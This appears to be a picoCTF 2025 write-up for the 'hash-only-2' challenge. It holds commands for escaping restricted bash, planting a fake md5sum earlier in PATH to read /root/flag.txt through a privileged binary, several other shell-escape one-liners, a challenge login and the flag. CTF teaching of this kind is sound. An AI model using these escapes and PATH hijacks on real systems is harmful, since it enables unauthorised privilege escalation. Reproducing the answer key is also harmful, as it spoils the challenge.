picoCTF Solutions
picoCTF 2025Binary ExploitationMedium

hash-only-2

Published: April 2, 2025

Description

The second flaghasher binary lives in /usr/local/bin and still shells out to md5sum. Escape the restricted shell, drop a fake md5sum earlier in PATH, and cat the flag.

Setup

SSH to rescued-float.picoctf.net -p 49568 (password f3b61b38).

Locate /usr/local/bin/flaghasher and spawn an unrestricted shell (`bash`).

ssh -p 49568 ctf-player@rescued-float.picoctf.net
find / -type f -iname flaghasher 2>/dev/null
bash
cd /usr/local/bin && echo "/bin/cat /root/flag.txt" > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher

Solution

  1. Step 1Escape rbash restrictions
    The login shell is restricted, so run `bash` to allow directory changes and PATH edits. Then `cd /usr/local/bin`.
    Learn more

    Restricted bash (rbash) is a hardened shell mode that prevents users from changing directories with cd, modifying PATH, redirecting output, or running commands with slashes in them. System administrators use it to lock down SSH accounts to a narrow set of approved commands.

    The classic escape is to invoke a full shell binary directly. If bash or sh is accessible, running it without the -r flag drops you into an unrestricted session. Other escapes include launching a text editor (vim's :shell command), using scripting interpreters (python3 -c 'import pty; pty.spawn("/bin/bash")'), or abusing allowed programs that themselves spawn shells (like man with !/bin/sh).

    In real-world penetration testing, restricted shells come up frequently after gaining initial SSH access to a locked-down account. Escaping rbash is one of the first post-exploitation steps and is covered extensively in OSCP and other security certifications.

  2. Step 2Hijack md5sum again
    Write a md5sum wrapper that cats /root/flag.txt, make it executable, prepend `.` to PATH, and execute flaghasher to dump the flag.
    Learn more

    PATH hijacking exploits how Unix-like systems resolve command names. When a program calls system("md5sum") or exec("md5sum") without an absolute path, the OS searches each directory in PATH left-to-right and runs the first match it finds.

    By prepending . (the current directory) to PATH and dropping a malicious script named md5sum there, you guarantee the OS runs your script instead of /usr/bin/md5sum. Your script can do anything the process's effective user can do - in this case, reading /root/flag.txt. This is the same attack that makes sudo unsafe when . appears in a root user's PATH.

    Real-world mitigations include using absolute paths in all system() and exec() calls, auditing PATH in privileged scripts with tools like shellcheck, and applying the principle of least privilege so the target binary never runs with elevated permissions. CVE databases are full of PATH hijacking vulnerabilities in commercial software.

Flag

picoCTF{Co-@utH0r_Of_Sy5tem_b!n@riEs_fc06...}

Same technique as hash-only-1-only the binary's path and restricted shell differ.

Want more picoCTF 2025 writeups?

Browse picoCTF 2025Full library

Useful tools for Binary Exploitation

Related reading

What to try next